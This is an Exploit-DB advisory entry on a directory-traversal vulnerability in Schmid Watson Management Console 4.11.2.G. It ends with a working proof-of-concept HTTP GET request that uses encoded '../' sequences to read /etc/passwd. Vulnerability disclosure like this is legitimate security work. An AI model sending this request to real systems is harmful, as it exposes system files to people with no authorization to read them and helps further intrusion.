Schmid Watson Management Console Directory Traversal Vulnerability

2013-01-09T00:00:00
ID EDB-ID:38203
Type exploitdb
Reporter Dhruv Shah
Modified 2013-01-09T00:00:00

Description

Schmid Watson Management Console Directory Traversal Vulnerability. Remote exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/57237/info

Schmid Watson Management Console is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue will allow an attacker to view arbitrary files within the context of the affected application. Information harvested may aid in launching further attacks.

Schmid Watson Management Console 4.11.2.G is vulnerable; other versions may also be affected. 

GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd http/1.1